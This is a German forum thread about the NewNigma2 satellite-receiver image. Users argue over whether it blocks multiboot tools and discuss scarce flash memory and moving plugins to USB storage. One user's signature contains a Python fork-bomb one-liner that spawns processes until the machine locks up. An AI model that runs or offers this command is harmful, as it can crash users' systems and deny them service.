warum Bestes Image

• Original von Kartenzwerg7
      Original von Gaspedal
      Wer verlangt denn hier Support ? Wo habe ich das geschrieben ? Mit kein Support habe ich die "Software-Sperre" der NewNigma2 als Nachteil erwähnt. MEHR NICHT !!

Dann kläre uns mal auf was eine "Software-Sperre" sein soll und wo die in unserem Image ist .

Genau wo ist die sperre? von uns hatt da keiner ne sperre eingebbaut es ist einfach eine inkompatibilität wie nix schon erwähnt hatt vom kernel her und beim umgang mit medien(usb,cd,dvd).
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Ob es eine inkompatibilität oder Software-Sperre ist kann ich nicht sagen, ist nur komisch dass ausgrechnet Newnigma2 sich da quer stellt.

Bei Multiboot denken viele gleich an fremdes Images. Dabei wollen die meisten das selbe Image auf USB haben um mehr Plugins zu installieren ohne dass der Flash Speicher gleich voll wird. Daher habe ich Newnigma2 im Flash und ein Backup auf der USB und da ist alles 100% kompatibel und ich kann so viele Plugins installieren wie ich will.

Da fragt man sich was Kacke ist.. Flash Speicher oder Image auf USB und Plugins ohne Ende. ;)

Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von Gaspedal ()

• Original von LoUiS
      Original von Gaspedal

- kein Support für Meoboot, deswegen benutze ich BarryAlen.

Wenn es aktuell fuer Dich funktioniert, schoen. Wenn es auf einmal nicht mehr geht, dann hast Du Pech, es wird Dir hier niemand helfen.

Muss auch niemand helfen. Wenn MB nicht mehr möglich ist kommt ein anderes Image drauf, so einfach ist das. ;) Das muss nicht sein, NewNigma2 ist wirklich ein tolles Images den ich ungern löschen würde, aber Flash Speicher ist einfach Kacke da man nur ein paar Plugins installieren kann.

Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von Gaspedal ()

• Original von Gaspedal
      Das muss nicht sein, NewNigma2 ist wirklich ein tolles Images den ich ungern löschen würde, aber Flash Speicher ist einfach Kacke da man nur ein paar Plugins installieren kann.

mit meiner 8k nutze ich 128mb flash speicher und habe platz ohne ende :D

die 8k besitzt normal 256 mb flash :D da brauch man keinen stick nur wird alles grösser 128 mb
      flash lahm ich hoffe ja immer noch auf einen neueren kernel und abschaffung vom jffs2 :D
      » time to say goodbye «

Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
    • Original von nixkoenner
      Original von Gaspedal
      Das muss nicht sein, NewNigma2 ist wirklich ein tolles Images den ich ungern löschen würde, aber Flash Speicher ist einfach Kacke da man nur ein paar Plugins installieren kann.

mit meiner 8k nutze ich 128mb flash speicher und habe platz ohne ende :D

die 8k besitzt normal 256 mb flash :D da brauch man keinen stick nur wird alles grösser 128 mb
      flash lahm ich hoffe ja immer noch auf einen neueren kernel und abschaffung vom jffs2 :D

256 MB. Schön wäre es, dann würde ich auch auf Stick verzichten :D Ich habe nur ca. 8 Plugins drauf und Flash Speicher ist schon zu 98% voll. :(
      Eine geniale Erfindung von Newnigma2 Team wäre, Plugins auf USB Stick auszulagern. Wäre das nicht möglich wenn man sein USB Stick mit ext2/3 formatiert und symlinks auf die Plugins setzt ? Stellt euch mal vor: Ein Newnigma2 Menü, wo man die Plugins einzeln auf USB Stick verschieben kann.. 8)

Dieser Beitrag wurde bereits 5 mal editiert, zuletzt von Gaspedal ()

• Ich denke mal das gibt es doch alles schon .
      Ich selber habe BA auch nur anfänglich benutzt und bin da nicht mehr auf dem laufenden aber wenn Du im Flash das gleiche Image hast sollte es doch mit BA & Co kein Problem sein . Also ein Basis-NewNigma2 im Flash und ein überdimensioniertes auf Stick .
      Und wie Nixkoenner geschrieben hat kann man ja den Flashspeicher quasi verdoppeln ....
      Stichwort : Maxroot
      Der einzig mir bekannte Nachteil ist das ein Backup des Images nicht so einfach möglich ist...aber wozu auch ?
      Kann alles , weiß alles und mache alles :pleased2:
    • Original von Gaspedal
      Eine geniale Erfindung von Newnigma2 Team wäre, Plugins auf USB Stick auszulagern. Wäre das nicht möglich wenn man sein USB Stick mit ext2/3 formatiert und symlinks auf die Plugins setzt ? Stellt euch mal vor: Ein Newnigma2 Menü, wo man die Plugins einzeln auf USB Stick verschieben kann.. 8)

Da kann ich dir nur zustimmen Gaspedal.Das wäre cool,wenn das fest im Image verbaut wäre.Weiß zwar nicht,ob das so einfach zu machen ist aber der Gedanke ist schon gut.Na es werden ja hoffentlich noch viele Releases kommen und vielleicht wird der Traum wahr. :]

lg
      loui
    • Original von std
      Hi

und warum nicht das ganze Image auf CF schieben mit dem CF-Installer?
      da ist doch dann reichlich Platz für Plugins

Na das wäre doch zu einfach und außerdem müßte man ja auf der FB noch ein paar Knöpfe drücken und sein Gehirn einschalten....
      Kann alles , weiß alles und mache alles :pleased2:
    • okay

mag sein. Wenn das so ist habe ich nix gesagt :)

Allerdings hat die 8000 doch genug Platz im Flash............................... hab ich gehört

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von std ()